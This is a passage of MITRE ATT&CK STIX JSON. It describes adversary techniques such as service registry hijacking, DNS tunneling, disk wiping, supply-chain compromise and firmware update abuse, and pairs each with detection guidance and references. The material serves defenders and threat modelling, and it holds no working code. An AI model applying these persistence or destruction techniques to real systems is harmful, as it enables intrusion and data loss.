"x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "Office 365", "SaaS", "IaaS", "Google Workspace"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", "created": "2020-02-21T21:15:33.222Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1069/003", "external_id": "T1069.003"}, {"source_name": "AWS Get Bucket ACL", "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html"}, {"source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022", "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.", "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"}, {"source_name": "Black Hills Red Teaming MS AD Azure, 2018", "description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.", "url": "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/"}, {"source_name": "Google Cloud Identity API Documentation", "description": "Google. (n.d.). Retrieved March 16, 2021.", "url": "https://cloud.google.com/identity/docs/reference/rest"}, {"source_name": "Microsoft AZ CLI", "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest"}, {"source_name": "Microsoft Msolrole", "description": "Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.", "url": "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0"}, {"source_name": "GitHub Raindance", "description": "Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.", "url": "https://github.com/True-Demon/raindance"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Services Registry Permissions Weakness", "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service\u2019s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service\u2019s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire", "Matthew Demaske, Adaptforward"], "x_mitre_deprecated": false, "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application Control"], "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", "created": "2020-03-13T11:42:14.444Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/011", "external_id": "T1574.011"}, {"source_name": "Tweet Registry Perms Weakness", "description": "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", "url": "https://twitter.com/r0wdy_/status/936365549553991680"}, {"source_name": "insecure_reg_perms", "description": "Cl\u00e9ment Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.", "url": "https://itm4n.github.io/windows-registry-rpceptmapper-eop/"}, {"source_name": "Kansa Service related collectors", "description": "Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.", "url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html"}, {"source_name": "malware_hides_service", "description": "Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.", "url": "https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/"}, {"source_name": "Autoruns for Windows", "description": "Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.", "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns"}, {"source_name": "Registry Key Security", "description": "Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.", "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN"}, {"source_name": "microsoft_services_registry_tree", "description": "Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved August 25, 2021.", "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree"}, {"source_name": "troj_zegost", "description": "Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.", "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "DNS/Passive DNS", "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target\u2019s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", "created": "2020-10-02T16:57:45.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1596/001", "external_id": "T1596.001"}, {"source_name": "DNS Dumpster", "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", "url": "https://dnsdumpster.com/"}, {"source_name": "Circl Passive DNS", "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", "url": "https://www.circl.lu/services/passive-dns/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Application Exhaustion Flood", "description": "Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "created": "2020-02-20T15:35:00.025Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1499/003", "external_id": "T1499.003"}, {"source_name": "Arbor AnnualDoSreport Jan 2018", "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf"}, {"source_name": "Cisco DoSdetectNetflow", "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Rc.common", "description": "During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.\n\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1163", "external_id": "T1163"}, {"source_name": "Startup Items", "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-13T14:47:31.204Z", "name": "Compromise Software Dependencies and Development Tools", "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "created": "2020-03-11T14:13:42.916Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1195/001", "external_id": "T1195.001"}, {"source_name": "Trendmicro NPM Compromise", "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.", "url": "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Digital Certificates", "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", "created": "2020-10-01T02:14:18.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/004", "external_id": "T1588.004"}, {"source_name": "DiginotarCompromise", "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/"}, {"source_name": "Let's Encrypt FAQ", "description": "Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved October 15, 2020.", "url": "https://letsencrypt.org/docs/faq/"}, {"source_name": "Splunk Kovar Certificates 2017", "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html"}, {"source_name": "Recorded Future Beacon Certificates", "description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.", "url": "https://www.recordedfuture.com/cobalt-strike-servers/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "DNS Server", "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", "created": "2020-10-01T00:40:45.279Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/002", "external_id": "T1583.002"}, {"source_name": "Unit42 DNS Mar 2019", "description": "Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020.", "url": "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Disk Wipe", "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "created": "2020-02-20T22:02:20.372Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1561", "external_id": "T1561"}, {"source_name": "erase_cmd_cisco", "description": "Cisco. (2022, August 16). erase - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463"}, {"source_name": "Novetta Blockbuster Destructive Malware", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf"}, {"source_name": "Microsoft Sysmon v6 May 2017", "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-12-26T20:54:38.721Z", "name": "DNS", "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jan Petrov, Citi", "Chris Heald"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "created": "2020-03-15T16:27:31.768Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1071/004", "external_id": "T1071.004"}, {"source_name": "Medium DnsTunneling", "description": "Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.", "url": "https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "PAN DNS Tunneling", "description": "Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.", "url": "https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:56:59.593Z", "name": "Activate Firmware Update Mode", "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Joe Slowik - Dragos"], "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Operational Databases: Device Alarm", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0800", "external_id": "T0800"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-03-21T13:56:27.910Z", "name": "Cloud Instance Metadata API", "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional 